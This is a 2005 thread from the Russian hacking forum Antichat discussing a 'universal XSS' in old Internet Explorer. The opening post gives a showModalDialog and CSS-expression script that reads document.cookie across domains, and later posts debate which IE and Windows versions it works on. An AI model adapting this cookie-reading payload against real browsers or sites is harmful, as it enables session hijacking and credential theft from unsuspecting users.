ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Универсальный Xss в Ie
  #1  
Старый 20.06.2005, 22:00
Аватар для JazzzSummerMan
JazzzSummerMan
Постоянный
Регистрация: 07.04.2004
Сообщений: 387
Провел на форуме:
293464

Репутация: 42
По умолчанию Универсальный Xss в Ie

с помощью этого скрипта можно получить доступ к cookies любого домена
Код:
<SCRIPT>
showModalDialog("http://forum.antichat.ru",null,"font-size:expression(window.execScript(unescape('alert%28%22Domain%3A%22+document.domain+%22%5CnCookie%3A%22+document.cookie%29%3Bwindow.close%28%29%3B')))");
</SCRIPT>
взял с секлаба
 
Ответить с цитированием

  #2  
Старый 20.06.2005, 22:21
Аватар для censored!
censored!
Green member - Level 3
Регистрация: 02.11.2004
Сообщений: 1,337
Провел на форуме:
2398258

Репутация: 648


По умолчанию

Там в верху год пишется: 4 декабря 2002
 
Ответить с цитированием

  #3  
Старый 20.06.2005, 22:27
Аватар для JazzzSummerMan
JazzzSummerMan
Постоянный
Регистрация: 07.04.2004
Сообщений: 387
Провел на форуме:
293464

Репутация: 42
По умолчанию

да хоть 99-й
 
Ответить с цитированием

  #4  
Старый 20.06.2005, 22:29
Аватар для censored!
censored!
Green member - Level 3
Регистрация: 02.11.2004
Сообщений: 1,337
Провел на форуме:
2398258

Репутация: 648


По умолчанию

И у тебя он пашет???
 
Ответить с цитированием

  #5  
Старый 20.06.2005, 22:31
Аватар для JazzzSummerMan
JazzzSummerMan
Постоянный
Регистрация: 07.04.2004
Сообщений: 387
Провел на форуме:
293464

Репутация: 42
По умолчанию

хм.. пашет..

форум просто меняет код. вот в тхт если что
Вложения
Тип файла: txt x.txt (228 байт, 40 просмотров)

Последний раз редактировалось JazzzSummerMan; 20.06.2005 в 22:34..
 
Ответить с цитированием

  #6  
Старый 20.06.2005, 22:31
Аватар для Че Гевара
Че Гевара
Администратор
Регистрация: 05.10.2003
Сообщений: 1,083
Провел на форуме:
4618051

Репутация: 45


По умолчанию

Да дело не в этом, просто в большинстве броузеров это не сработает ...
xp sp2 не пашет, на sp1 думаю тоже ...
ИМХО, только на IE ниже 5 версии (или 5, хз)

Надо проверить ...
Цитата:
хм.. пашет..
хехе, на тебе что не проверяй - все пашет ))

Последний раз редактировалось Че Гевара; 20.06.2005 в 22:34..
 
Ответить с цитированием

  #7  
Старый 20.06.2005, 22:36
Аватар для JazzzSummerMan
JazzzSummerMan
Постоянный
Регистрация: 07.04.2004
Сообщений: 387
Провел на форуме:
293464

Репутация: 42
По умолчанию

Работает в шестой версии, проверялось на XPSP1, ну и на Win 98)
да и вобще такого типа уязвимость от ОС вряд ли зависит. только от версии IE
 
Ответить с цитированием

  #8  
Старый 20.06.2005, 22:50
Аватар для Че Гевара
Че Гевара
Администратор
Регистрация: 05.10.2003
Сообщений: 1,083
Провел на форуме:
4618051

Репутация: 45


По умолчанию

Цитата:
да и вобще такого типа уязвимость от ОС вряд ли зависит. только от версии IE
Тут дело в изменениях в плане безопасности, появившихся во втором сервис паке + некоторые другие факторы, такие как наличие фаервола с фильтрацией интерактивных элементов, наличе, изменения каких-либо настроек (в частности отключение ActiveX ) и т.п. ...

Кстати, вот например эксплоит с переполнением буфера через <iframe> работает только на xp или xp sp1. Под 2k или sp2 он просто вешает осла, при этом никакие команды не выполняются.
Так что от ОС очень даже зависит ...

Последний раз редактировалось Че Гевара; 20.06.2005 в 22:53..
 
Ответить с цитированием

  #9  
Старый 20.06.2005, 23:07
Аватар для JazzzSummerMan
JazzzSummerMan
Постоянный
Регистрация: 07.04.2004
Сообщений: 387
Провел на форуме:
293464

Репутация: 42
По умолчанию

Ну почти.. я не то немного имел ввиду. Здесь именно такая уязвимость имхо
Вот ДоС или переполнения буфера зависят от ОС, а здесь уже не затрагивается движок проводника, а ошибка чисто в надстройках, поэтому и говорю. Ну если конечно рассматривать что в Sp входят патчи для Ie, то и от неё зависит. короче, ладно))
 
Ответить с цитированием

  #10  
Старый 23.06.2005, 12:50
Аватар для Algol
Algol
Регистрация: 29.05.2002
Сообщений: 1,793
Провел на форуме:
2050916

Репутация: 0


По умолчанию

На XP SP2 IE6 - не работает...
При попытке задания expression в опциях пишет Bad argument
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ